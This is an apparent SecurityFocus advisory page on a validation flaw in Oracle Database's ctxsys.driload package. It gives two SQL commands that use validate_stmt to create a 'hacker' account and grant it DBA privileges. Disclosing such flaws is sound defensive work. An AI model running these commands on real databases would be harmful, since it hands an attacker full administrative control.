Oracle Database Server ctxsys.driload Access Validation Vulnerability

The following example was provided:

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');


 

Privacy Statement
Copyright 2010, SecurityFocus